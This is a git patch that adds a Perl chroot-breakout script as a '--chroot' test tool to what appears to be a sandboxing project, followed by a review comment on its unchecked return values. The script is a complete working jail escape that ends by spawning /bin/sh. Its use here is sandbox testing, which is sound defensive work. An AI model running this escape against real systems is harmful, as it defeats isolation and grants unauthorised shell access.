From 1cb8ef59101eeaa1b325fb7f881ded148b0de1d3 Mon Sep 17 00:00:00 2001
From: netblue30
Date: Sat, 31 Oct 2015 13:07:38 -0400
Subject: --chroot testing
---
src/tools/unchroot.pl | 33 +++++++++++++++++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100755 src/tools/unchroot.pl
(limited to 'src/tools/unchroot.pl')
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl
new file mode 100755
index 000000000..bd30ffe76
--- /dev/null
+++ b/src/tools/unchroot.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl -w
+use strict;
+# unchroot.pl Dec 2007
+# http://pentestmonkey.net/blog/chroot-breakout-perl
+
+# This script may be used for legal purposes only.
+
+# Go to the root of the jail
+chdir "/";
+
+# Open filehandle to root of jail
+opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
+
+# Create a subdir, move into it
+mkdir "mysubdir";
+chdir "mysubdir";
+
+# Lock ourselves in a new jail
+chroot ".";
+
+# Use our filehandle to get back to the root of the old jail
+chdir(*JAILROOT);
+
+# Get to the real root
+while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
+ chdir "..";
+}
+
+# Lock ourselves in real root - so we're not really in a jail at all now
+chroot ".";
+
+# Start an un-jailed shell
+system("/bin/sh");
-- cgit v1.2.3-54-g00ecf
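Review bot: As a `--chroot` test helper this script cannot report a result, because every `chdir`, `mkdir` and both `chroot "."` calls ignore their return value and the final `system("/bin/sh")` runs unconditionally. If the sandbox blocks `chroot` (for example by dropping the capability), the tester still gets a shell and cannot tell "contained" from "escaped" without inspecting it by hand. Each call should be checked so that a blocked step ends the run with a non-zero status the test harness can assert on, e.g. `chroot "." or die "chroot refused: $!\n";`, and likewise for `chdir(*JAILROOT)`. The existing `die` message ends in `jailn`, which looks like a lost `\n` escape (possibly a rendering artefact). A header comment stating the expected outcome under the sandbox would also make the intent of the test clear.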